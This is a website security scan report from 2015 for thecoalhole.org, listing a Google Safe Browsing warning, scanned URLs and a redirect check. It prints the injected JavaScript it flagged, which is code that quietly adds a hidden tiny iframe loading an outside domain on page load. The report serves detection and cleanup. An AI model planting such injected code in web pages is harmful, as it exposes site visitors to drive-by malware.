Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thecoalhole.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.thecoalhole.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 24 Jan 2015 06:16:29 GMT Location: http://thecoalhole.org/ Server: Apache Content-Encoding: none Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://thecoalhole.org/xmlrpc.php | clean |
http://thecoalhole.org/ | 200 OK Content-Length: 54665 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } }
function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } }
Antivirus reports:
http://spa-sibo.org/wp-content/plugins/zadat_vopros/google-analystyc.php | 500 Can't connect to spa-sibo.org:80 Content-Length: 187 Content-Type: text/plain | clean |
http://spa-sibo.org/test404page.js | 500 Can't connect to spa-sibo.org:80 Content-Length: 187 Content-Type: text/plain | clean |
http://adultbiz.in/new/jquery.php | 200 OK Content-Length: 8693 Content-Type: text/html | clean |
http://d32ffatx74qnju.cloudfront.net/scripts/js3caf.js | 200 OK Content-Length: 3490 Content-Type: application/javascript | clean |
http://d32ffatx74qnju.cloudfront.net/scripts/tier2caf.js | 200 OK Content-Length: 28902 Content-Type: application/javascript | clean |
http://adultbiz.in/scripts/feedmeCaf.php?q=&ip=78.158.11.226&max=10&hl=lt&d=adultbiz.in&ron=0&adult=0 | 200 OK Content-Length: 5488 Content-Type: text/plain | clean |
http://twitterwidget.net/twitter_class/index.php?ors=&phrase=UK+energy&height=400px | 200 OK Content-Length: 342 Content-Type: text/html | clean |
http://www.thecoalhole.org/wp-content/themes/black-letterhead/js/feed.js | 200 OK Content-Length: 373 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thecoalhole.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 24 Jan 2015 06:16:30 GMT
Server: Apache
Content-Encoding: none
Content-Length: 54665
Content-Type: text/html; charset=UTF-8
Link: <http://thecoalhole.org/>; rel=shortlink
X-Pingback: http://thecoalhole.org/xmlrpc.php
...54665 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thecoalhole.org
Referer: http://www.google.com/search?q=thecoalhole.org
Result:
The result is similar to the first query. There are no suspicious redirects found.